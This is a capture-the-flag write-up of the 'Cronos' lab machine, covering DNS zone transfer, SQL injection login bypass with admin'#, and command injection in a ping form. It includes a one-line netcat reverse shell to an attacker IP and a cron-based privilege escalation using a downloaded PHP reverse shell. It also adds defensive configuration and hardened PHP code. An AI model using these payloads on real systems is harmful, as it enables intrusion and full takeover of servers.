
Cronos Write up

Welcome to my Cronos Write-up

Recon

Nmap

$ sudo nmap -sSVC -A -oA nmap/Cronos 10.10.10.13

Nmap scan report for 10.10.10.13
Host is up (0.077s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18b973826f26c7788f1b3988d802cee8 (RSA)
|   256 1ae606a6050bbb4192b028bf7fe5963b (ECDSA)
|_  256 1a0ee7ba00cc020104cda3a93f5e2220 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
...
$ sudo nmap -p- -Pn -A -T4 10.10.10.13

Nmap scan report for 10.10.10.13
Host is up (0.084s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18b973826f26c7788f1b3988d802cee8 (RSA)
|   256 1ae606a6050bbb4192b028bf7fe5963b (ECDSA)
|_  256 1a0ee7ba00cc020104cda3a93f5e2220 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
...
$ sudo nmap -sU -A -Pn 10.10.10.13

Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-01 09:29 +01
Nmap scan report for 10.10.10.13
Host is up (0.088s latency).
Not shown: 999 closed udp ports (port-unreach)
PORT   STATE SERVICE VERSION
53/udp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

DNS (PORT 53)

We can see that port 53 is open on this machine. Let’s do some enumeration.

Make sure to add cronos.htb to /etc/hosts.

$ dig any cronos.htb @10.10.10.13

; <<>> DiG 9.18.12-1-Debian <<>> any cronos.htb @10.10.10.13
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 33426
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;cronos.htb.                    IN      ANY

;; ANSWER SECTION:
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13

;; ADDITIONAL SECTION:
ns1.cronos.htb.         604800  IN      A       10.10.10.13

;; Query time: 84 msec
;; SERVER: 10.10.10.13#53(10.10.10.13) (TCP)
;; WHEN: Mon May 01 09:47:22 +01 2023
;; MSG SIZE  rcvd: 131
$ dnsrecon -d cronos.htb -a -n 10.10.10.13

[*] std: Performing General Enumeration against: cronos.htb...
[*] Checking for Zone Transfer for cronos.htb name servers
[*] Resolving SOA Record
[+]      SOA cronos.htb 10.10.10.13
[*] Resolving NS Records
[*] NS Servers found:
[+]      NS ns1.cronos.htb 10.10.10.13
[*] Removing any duplicate NS server IP Addresses...
[*]  
[*] Trying NS server 10.10.10.13
[+] 10.10.10.13 Has port 53 TCP Open
[+] Zone Transfer was successful!!
[*]      NS ns1.cronos.htb 10.10.10.13
[*]      A @.cronos.htb 10.10.10.13
[*]      A admin.cronos.htb 10.10.10.13
[*]      A ns1.cronos.htb 10.10.10.13
[*]      A www.cronos.htb 10.10.10.13
[*] Checking for Zone Transfer for cronos.htb name servers
[*] Resolving SOA Record
[+]      SOA cronos.htb 10.10.10.13
[*] Resolving NS Records
[*] NS Servers found:
[+]      NS ns1.cronos.htb 10.10.10.13
[*] Removing any duplicate NS server IP Addresses...
[*]  
[*] Trying NS server 10.10.10.13
[+] 10.10.10.13 Has port 53 TCP Open
[+] Zone Transfer was successful!!
[*]      NS ns1.cronos.htb 10.10.10.13
[*]      A @.cronos.htb 10.10.10.13
[*]      A admin.cronos.htb 10.10.10.13
[*]      A ns1.cronos.htb 10.10.10.13
[*]      A www.cronos.htb 10.10.10.13
[-] Could not resolve domain: cronos.htb

Make sure to add cronos.htb, admin.cronos.htb, www.cronos.htb and ns1.cronos.htb to /etc/hosts.
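The successful zone transfer above is a server-side configuration issue: BIND answered an AXFR from an arbitrary client and handed over every hostname in the zone. As an added example (not the box's own named.conf), here is a zone stanza with the permissive transfer setting beside a restricted one; the zone file path and the secondary's address are placeholders.

```conf
// Global default: refuse zone transfers unless a zone says otherwise.
options {
    allow-transfer { none; };
};

zone "cronos.htb" {
    type master;
    file "/etc/bind/db.cronos.htb";          // placeholder path

    // Weak setting (also the implicit default on this BIND version when
    // nothing is configured): any client may pull the whole zone.
    // allow-transfer { any; };

    // Corrected: only the authorised secondary may transfer the zone.
    allow-transfer { 10.10.10.254; };        // placeholder secondary address
};
```

After the change, the `dnsrecon -a` run above should report the transfer as refused rather than successful; ordinary A/NS/SOA lookups are unaffected because `allow-query` is not touched.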

HTTP (PORT 80)

http://cronos.htb

image 1

http://admin.cronos.htb

image 2

Initial Foothold

http://admin.cronos.htb

We tried default credentials such as admin:admin, but nothing worked.

Let's try some SQL injection: link

admin'#

It worked.

image 3

image 4

I found a ping option, let’s use it and see if I can ping back my local machine.

image 5

The ping is working.

This looks like an attack vector. Let's capture the request using Burp Suite.

Method 1 (using Burp Suite):

Change the command:

image 6

Hit FORWARD.

image 7

Method 2:

image 8

Output:

image 9

Grab a shell from here.

8.8.8.8;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.23 1234 >/tmp/f


image 10

Hit execute!

image 11
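Both footholds above are input-handling defects in the admin panel: the login concatenates the username into its SQL query, and the ping feature passes user input straight to a shell. The following is an added example, not code from the box or from the original post: hardened versions of a login check and a ping handler, with the vulnerable patterns noted in comments for contrast. The table and column names, the SQLite backing store, and the parameter names are assumptions made for the demo.

```php
<?php
// Added example (not the box's own code). Table/column names, the
// SQLite database and the parameter names are assumptions.

function login(PDO $db, string $user, string $pass): bool {
    // Vulnerable pattern, for contrast only:
    //   "SELECT * FROM users WHERE username='$user' AND password='$pass'"
    // A username of  admin'#  closes the string and comments out the
    // password check. With a bound parameter the quote and '#' stay
    // inside the data and cannot change the shape of the query.
    $stmt = $db->prepare('SELECT password_hash FROM users WHERE username = ?');
    $stmt->execute([$user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($pass, $row['password_hash']);
}

function ping(string $target): string {
    // Vulnerable pattern: shell_exec("ping -c 4 " . $_POST['command']);
    // ';' lets the caller append a second command (as in the payload above).
    // Accept only a literal IP address, and quote it anyway as a second layer.
    if (filter_var($target, FILTER_VALIDATE_IP) === false) {
        throw new InvalidArgumentException('target must be an IP address');
    }
    $out = shell_exec('ping -c 4 ' . escapeshellarg($target) . ' 2>&1');
    return $out ?? '';
}

// Minimal wiring: an in-memory SQLite database with one hashed user,
// both constructed here for the example.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT)');
$db->prepare('INSERT INTO users VALUES (?, ?)')
   ->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);

// The injection string is now treated as a literal (non-existent) username.
var_dump(login($db, "admin'#", 'anything'));
var_dump(login($db, 'admin', 'correct horse'));

try {
    // Rejected by the validator before any shell is started.
    ping('8.8.8.8; echo injected');
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), PHP_EOL;
}
```

From the defender's side, requests to the ping endpoint whose parameter contains shell metacharacters (`;`, `|`, `&`, backticks) are a cheap web-log detection for the technique shown above.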

Privilege Escalation

www-data@cronos:/var/www/admin$ cat /etc/crontab


image 12

As you can see, the system keeps executing the file artisan as root. This file seems to be a PHP script, so let's upload a PHP reverse shell, rename it to artisan, and then execute it as root using sudo.

$ locate shell.php


$ cp /usr/share/webshells/php/php-reverse-shell.php shell.php


Don't forget to edit that reverse shell and change the attacker's IP address and port.

$ python3 -m http.server 8000


www-data@cronos:/var/www/admin$ wget http://10.10.14.23:8000/shell.php


www-data@cronos:/var/www/admin$ cp shell.php /var/www/laravel/


www-data@cronos:/var/www/admin$ cd /var/www/laravel


www-data@cronos:/var/www/laravel$ mv shell.php artisan


www-data@cronos:/var/www/laravel$ sudo php artisan


We are prompted for a password. I just kept messing around and typing random passwords.

gif 1

image 13

This post is licensed under CC BY 4.0 by the author.